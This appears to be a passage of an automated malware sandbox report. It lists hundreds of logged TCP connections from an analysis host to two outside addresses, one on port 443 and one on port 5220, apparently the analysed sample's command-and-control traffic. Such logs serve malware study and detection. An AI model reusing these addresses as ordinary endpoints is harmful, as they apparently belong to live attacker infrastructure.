                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 94.156.167.55:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 94.156.167.55:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49167
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49171
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49172
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49176
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49176
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49177
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49177
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49178
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49178
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49179
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49180
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49180
                Source: global trafficTCP traffic: 192.168.2.22:49180 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49181
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49181
                Source: global trafficTCP traffic: 192.168.2.22:49181 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49182 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49182
                Source: global trafficTCP traffic: 192.168.2.22:49182 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49182
                Source: global trafficTCP traffic: 192.168.2.22:49182 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49183 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49183
                Source: global trafficTCP traffic: 192.168.2.22:49183 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49183
                Source: global trafficTCP traffic: 192.168.2.22:49183 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49184 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49184
                Source: global trafficTCP traffic: 192.168.2.22:49184 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49184
                Source: global trafficTCP traffic: 192.168.2.22:49184 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49185 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49185
                Source: global trafficTCP traffic: 192.168.2.22:49185 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49185
                Source: global trafficTCP traffic: 192.168.2.22:49185 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49186 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49186
                Source: global trafficTCP traffic: 192.168.2.22:49186 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49186
                Source: global trafficTCP traffic: 192.168.2.22:49186 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49187 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49187
                Source: global trafficTCP traffic: 192.168.2.22:49187 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49187
                Source: global trafficTCP traffic: 192.168.2.22:49187 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49188 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49188
                Source: global trafficTCP traffic: 192.168.2.22:49188 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49188
                Source: global trafficTCP traffic: 192.168.2.22:49188 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49189 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49189
                Source: global trafficTCP traffic: 192.168.2.22:49189 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49189
                Source: global trafficTCP traffic: 192.168.2.22:49189 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49190 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49190
                Source: global trafficTCP traffic: 192.168.2.22:49190 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49190
                Source: global trafficTCP traffic: 192.168.2.22:49190 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49191 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49191
                Source: global trafficTCP traffic: 192.168.2.22:49191 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49191
                Source: global trafficTCP traffic: 192.168.2.22:49191 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49192 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49192
                Source: global trafficTCP traffic: 192.168.2.22:49192 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49192
                Source: global trafficTCP traffic: 192.168.2.22:49192 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49193 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49193
                Source: global trafficTCP traffic: 192.168.2.22:49193 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49193
                Source: global trafficTCP traffic: 192.168.2.22:49193 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49194 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49194
                Source: global trafficTCP traffic: 192.168.2.22:49194 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49194
                Source: global trafficTCP traffic: 192.168.2.22:49194 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49195 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49195
                Source: global trafficTCP traffic: 192.168.2.22:49195 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49195
                Source: global trafficTCP traffic: 192.168.2.22:49195 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49196 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49196
                Source: global trafficTCP traffic: 192.168.2.22:49196 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49196
                Source: global trafficTCP traffic: 192.168.2.22:49196 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49197 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49197
                Source: global trafficTCP traffic: 192.168.2.22:49197 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49197
                Source: global trafficTCP traffic: 192.168.2.22:49197 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49198 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49198
                Source: global trafficTCP traffic: 192.168.2.22:49198 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49198
                Source: global trafficTCP traffic: 192.168.2.22:49198 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49199 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49199
                Source: global trafficTCP traffic: 192.168.2.22:49199 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49199
                Source: global trafficTCP traffic: 192.168.2.22:49199 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49200 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49200
                Source: global trafficTCP traffic: 192.168.2.22:49200 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49200
                Source: global trafficTCP traffic: 192.168.2.22:49200 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49201 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49201
                Source: global trafficTCP traffic: 192.168.2.22:49201 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49201
                Source: global trafficTCP traffic: 192.168.2.22:49201 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49202 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49202
                Source: global trafficTCP traffic: 192.168.2.22:49202 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49202
                Source: global trafficTCP traffic: 192.168.2.22:49202 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49203 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49203
                Source: global trafficTCP traffic: 192.168.2.22:49203 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49203
                Source: global trafficTCP traffic: 192.168.2.22:49203 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49204 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49204
                Source: global trafficTCP traffic: 192.168.2.22:49204 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49204
                Source: global trafficTCP traffic: 192.168.2.22:49204 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49205 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49205
                Source: global trafficTCP traffic: 192.168.2.22:49205 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49205
                Source: global trafficTCP traffic: 192.168.2.22:49205 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49206 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49206
                Source: global trafficTCP traffic: 192.168.2.22:49206 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49206
                Source: global trafficTCP traffic: 192.168.2.22:49206 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49207 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49207
                Source: global trafficTCP traffic: 192.168.2.22:49207 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49207
                Source: global trafficTCP traffic: 192.168.2.22:49207 -> 87.120.121.160:5220
